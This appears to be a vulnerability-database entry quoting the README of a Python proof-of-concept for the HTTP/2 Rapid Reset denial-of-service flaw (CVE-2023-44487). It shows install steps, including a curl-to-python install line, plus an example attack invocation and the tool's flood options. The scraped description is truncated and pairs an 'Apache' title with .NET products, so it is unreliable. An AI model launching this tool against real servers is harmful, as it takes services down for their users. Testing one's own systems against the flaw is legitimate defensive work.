
CVE-2023-44487 PoC: Apache HTTP/2 Resource Management Error Vulnerability

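Source
Related vulnerability
Title: Apache HTTP/2 Resource Management Error Vulnerability (CVE-2023-44487)
Description: HTTP/2 is the second version of the Hypertext Transfer Protocol, used mainly for communication between clients and servers. Apache HTTP/2 contains a security vulnerability that an attacker can exploit to cause a denial of service. The following products and versions are affected: .NET 6.0, ASP.NET Core 6.0, .NET 7.0, Microsoft Visual Studio 2022 version 17.2, Microsoft Visual Studio 2022 version 17.4, Microsoft Visual Studio 2022 version 17.6, Micros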
Description
A python based exploit to test out rapid reset attack (CVE-2023-44487)
Introduction
# HTTP2 Rapid Reset Attack: CVE-2023-44487
Quick exploit to test out the rapid reset attack (CVE-2023-44487). Note: For educational purposes only.

## Table of Contents

- [Installation](#installation)
- [Usage](#usage)

## Installation

Clone the repository to your local machine using Git, install Poetry, and run the program:

```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git

cd CVE-2023-44487

# Install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -

# Install the project dependencies:
poetry install

# Activate the virtual environment created by Poetry:
poetry shell

# Run help:
python main.py

# Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100  --max_streams 20 --parallel_connections 2
```

## Usage

```bash
Usage: main.py [OPTIONS]

Options:
  --host TEXT                     Host URL  [required]
  --path TEXT                     Path on the host  [required]
  --headers TEXT                  Headers (comma-separated)  [required]
  --port INTEGER                  Port number  [required]
  --requests_count INTEGER        Number of requests to be sent  [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.
```




